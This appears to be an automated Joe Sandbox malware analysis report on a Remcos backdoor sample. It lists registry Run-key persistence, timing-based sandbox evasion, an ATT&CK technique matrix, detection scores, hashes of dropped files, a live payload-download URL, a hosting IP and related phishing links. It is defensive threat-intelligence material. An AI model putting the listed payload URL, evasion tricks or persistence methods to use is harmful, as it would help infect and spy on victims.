          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scrJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriamJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam\Fonerne237Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnkJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeFile opened: \Device\RasAcd count: 184819Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeAPI/Special instruction interceptor: Address: 4F98E86
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeAPI/Special instruction interceptor: Address: 1AD8E86
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRDTSC instruction interceptor: First address: 4F5824C second address: 4F5824C instructions: 0x00000000 rdtsc 0x00000002 test cx, 3986h 0x00000007 cmp ah, bh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F0A287374EEh 0x0000000d cmp di, E0BCh 0x00000012 inc ebp 0x00000013 inc ebx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeRDTSC instruction interceptor: First address: 1A9824C second address: 1A9824C instructions: 0x00000000 rdtsc 0x00000002 test cx, 3986h 0x00000007 cmp ah, bh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F0A28B3ED9Eh 0x0000000d cmp di, E0BCh 0x00000012 inc ebp 0x00000013 inc ebx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeWindow / User API: threadDelayed 5323Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeWindow / User API: threadDelayed 3022Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100Thread sleep count: 5323 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100Thread sleep time: -15969000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588Thread sleep count: 238 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588Thread sleep time: -238000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100Thread sleep count: 3022 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 4100Thread sleep time: -9066000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588Thread sleep count: 69 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exe TID: 6588Thread sleep time: -69000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_0040672B FindFirstFileW,FindClose,2_2_0040672B
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405AFA
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005881000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: ix8kxoBHDb.exe, 00000002.00000002.3784806023.00000000058B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeAPI call chain: ExitProcess graph end nodegraph_0-4556
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeAPI call chain: ExitProcess graph end nodegraph_0-4711
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_73B01B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01B5F
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeProcess created: C:\Users\user\Desktop\ix8kxoBHDb.exe "C:\Users\user\Desktop\ix8kxoBHDb.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: C:\Users\user\Desktop\ix8kxoBHDb.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-X164UOJump to behavior
          Source: Yara matchFile source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ix8kxoBHDb.exe PID: 7876, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          111
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          11
          Masquerading
          OS Credential Dumping31
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          11
          Process Injection
          11
          Virtualization/Sandbox Evasion
          LSASS Memory11
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Clipboard Data
          1
          Remote Access Software
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          Security Account Manager1
          Application Window Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading
          11
          Process Injection
          NTDS3
          File and Directory Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets23
          System Information Discovery
          SSHKeylogging113
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ix8kxoBHDb.exe63%ReversingLabsWin32.Backdoor.Remcos
          ix8kxoBHDb.exe70%VirustotalBrowse
          ix8kxoBHDb.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr63%ReversingLabsWin32.Backdoor.Remcos
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://www.healthselflesssupplies.co.za/%0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bins0%Avira URL Cloudsafe
          https://www.healthselflesssupplies.co.za/cdOCcPHZK213.bin0%Avira URL Cloudsafe
          ro0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          healthselflesssupplies.co.za
          164.160.91.32
          truefalse
            unknown
            www.healthselflesssupplies.co.za
            unknown
            unknownfalse
              unknown
              kezdns.pro
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                rotrue
                • Avira URL Cloud: safe
                unknown
                https://www.healthselflesssupplies.co.za/cdOCcPHZK213.binfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.healthselflesssupplies.co.za/%ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorix8kxoBHDb.exe, Leucocytopenia.scr.2.drfalse
                  high
                  https://www.healthselflesssupplies.co.za/ix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.healthselflesssupplies.co.za/cdOCcPHZK213.binsix8kxoBHDb.exe, 00000002.00000002.3784806023.0000000005858000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  164.160.91.32
                  healthselflesssupplies.co.zaSouth Africa
                  328037ElitehostZAfalse
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588998
                  Start date and time:2025-01-11 08:10:20 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 40s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:12
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ix8kxoBHDb.exe
                  renamed because original name is a hash value
                  Original Sample Name:d0625305c7cada6abafc98eca583c35ac2e25028cb63f43fee168b9bb6c5f8fb.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@3/11@45/1
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 91%
                  • Number of executed functions: 55
                  • Number of non-executed functions: 71
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target ix8kxoBHDb.exe, PID 7876 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  02:12:24API Interceptor1810943x Sleep call for process: ix8kxoBHDb.exe modified
                  08:11:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr
                  08:11:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  164.160.91.32IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                      Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                          https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ElitehostZAIpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            Purchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 164.160.91.32
                            https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                            • 164.160.91.32
                            https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.comGet hashmaliciousUnknownBrowse
                            • 164.160.91.37
                            https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6Get hashmaliciousUnknownBrowse
                            • 164.160.91.31
                            https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==Get hashmaliciousUnknownBrowse
                            • 164.160.91.31
                            http://www.fire.co.zaGet hashmaliciousUnknownBrowse
                            • 164.160.91.17
                            https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=Get hashmaliciousUnknownBrowse
                            • 164.160.91.23
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                            • 164.160.91.32
                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            • 164.160.91.32
                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 164.160.91.32
                            AM983ebb5F.exeGet hashmaliciousGuLoaderBrowse
                            • 164.160.91.32
                            av8XPPpdBc.exeGet hashmaliciousGuLoaderBrowse
                            • 164.160.91.32
                            QNuQ5e175D.exeGet hashmaliciousGuLoaderBrowse
                            • 164.160.91.32
                            7uY105UTJU.exeGet hashmaliciousGuLoaderBrowse
                            • 164.160.91.32
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dllc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                              ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                  4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                            b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):48
                                                Entropy (8bit):4.829448698502606
                                                Encrypted:false
                                                SSDEEP:3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
                                                MD5:E7F60749537446D1C77072173B5415A3
                                                SHA1:B9CFEF43585C8B26A5DAA2FE581859759A183C67
                                                SHA-256:3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
                                                SHA-512:D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
                                                Malicious:false
                                                Reputation:low
                                                Preview:[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 72069123252974004469760.000000
                                                Category:dropped
                                                Size (bytes):1313973
                                                Entropy (8bit):3.508594159446496
                                                Encrypted:false
                                                SSDEEP:6144:f2skF7pUvuvCIv8qXCQnXa3i45gOkf9r001oK/gRrqAp5ktoP50sUjj6gX6QM25Q:f2skFO6CbgnqFNY9AbesZfHth2CKJKSq
                                                MD5:1934F562773490B68C7BF52DB4FA88B9
                                                SHA1:E6D1EFC0B3E28A4BECAC04600F4F42F0087B0D69
                                                SHA-256:0EE79FFDC0612D496B06362E2567E476CD57277130B1AF9CF44A9239D1D83DB3
                                                SHA-512:4EB715DBE0CB8C940D7762CB905CC3725141FFD67866BF73E671B58F52EE7AFC5FD0B0FBCF18D8E5E1E7D8B07211B62EFFD75EAFBB4A86FD289FEB616763D5F0
                                                Malicious:false
                                                Reputation:low
                                                Preview:.#......,...................m............".......#..........................................................t.x.............................................................................................................................................................................G...R...............j...........................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.719859767584478
                                                Encrypted:false
                                                SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: c7WJL1gt32.exe, Detection: malicious, Browse
                                                • Filename: ZaRP7yvL1J.exe, Detection: malicious, Browse
                                                • Filename: 4AMVusDMPP.exe, Detection: malicious, Browse
                                                • Filename: 4AMVusDMPP.exe, Detection: malicious, Browse
                                                • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                • Filename: WGi85dsMNp.exe, Detection: malicious, Browse
                                                • Filename: czHx16QwGQ.exe, Detection: malicious, Browse
                                                • Filename: rXKfKM0T49.exe, Detection: malicious, Browse
                                                • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                Reputation:high, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):514430
                                                Entropy (8bit):7.954530383366024
                                                Encrypted:false
                                                SSDEEP:12288:B7MyjkhHoKi/5FeA7Bp8YNs8z0UTcmQo8CJsGmZ:B7M86ghxTRdJshZ
                                                MD5:D09DBFCAACC4E72DC2FF2D9119B7B9F1
                                                SHA1:8691AC9BBABBE829446B56C73888D8A0ADF0B92B
                                                SHA-256:D0625305C7CADA6ABAFC98ECA583C35AC2E25028CB63F43FEE168B9BB6C5F8FB
                                                SHA-512:B263E88A053292DD0F12DFFC01BE23E90198FB05591BACAB6471AFDC9A49254C65AB560301EDADA29E4051F698AD8BB1DE1E6563338E7EA51CA3032670F0C75F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 63%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.......4............@..........................`............@.......................................... ..`1...........................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...p...............................rsrc...`1... ...2..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):27
                                                Entropy (8bit):4.134336113194451
                                                Encrypted:false
                                                SSDEEP:3:iGAeSMn:lAeZ
                                                MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:[Access]..Setting=Enabled..
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                Category:dropped
                                                Size (bytes):874
                                                Entropy (8bit):3.3951840275462395
                                                Encrypted:false
                                                SSDEEP:12:8wl0o0m/3BV6XDPK827Mex9sl9fW+wR27Mvsl9BMJOoL6CNbw4t2YZ/elFlSJm:8kJ/B8Krm9e+wk92w2bIqy
                                                MD5:61D3C4D77CBCA1AE04559422C932EFE7
                                                SHA1:07E98507BB562BFF3939D341D22D7E8B6DEF27B2
                                                SHA-256:08790BA95B132630A2EB17C576F57CA8CA0122739F6438EEBD26803C8B73A301
                                                SHA-512:9075464885F86366BF0C22CF418867EC284D1FB377C2333031AEE5382322269BF99B1AF0439C4E3455023F750D4CCFAB74FCB34DCAF65EE1315CE60E442DCA31
                                                Malicious:false
                                                Preview:L..................F........................................................e....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....r.1...........punktnedslagenes..R............................................p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s... .n.2...........Suspired157.Ege.P............................................S.u.s.p.i.r.e.d.1.5.7...E.g.e.......=.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.p.u.n.k.t.n.e.d.s.l.a.g.e.n.e.s.\.S.u.s.p.i.r.e.d.1.5.7...E.g.e.8.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.b.r.u.g.s.e.r.\.b.r.u.g.o.\.O.b.s.t.e.t.r.i.k.e.r.........$..................C..B..g..(.#................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                Process:C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):295837
                                                Entropy (8bit):7.485285267564396
                                                Encrypted:false
                                                SSDEEP:6144:6kF7pUvuvCIv8qXCQnXa3i45gOkf9r001oK/gRrqAp5ktoP5Q:6kFO6CbgnqFNY9AbesZfHe
                                                MD5:97E5FA6EF225AEE82B0A518A5ED7CF96
                                                SHA1:CC886F0D87EB0C43D54FC4F8E29498C01F626B23
                                                SHA-256:D8386CD5AE1CE0C3232BDEE60DF363ECFB93839D8C7DC6CCAEA62427A6F9E1D3
                                                SHA-512:A7CB4DC6844AEBA16563F263458DB0413B2FD3F1194D302C601DCDF67BAD03E9C679117C398E345078F253D1A2E15F7BFB12B3E571B6BEECFEE63CDC75FEAFA2
                                                Malicious:false
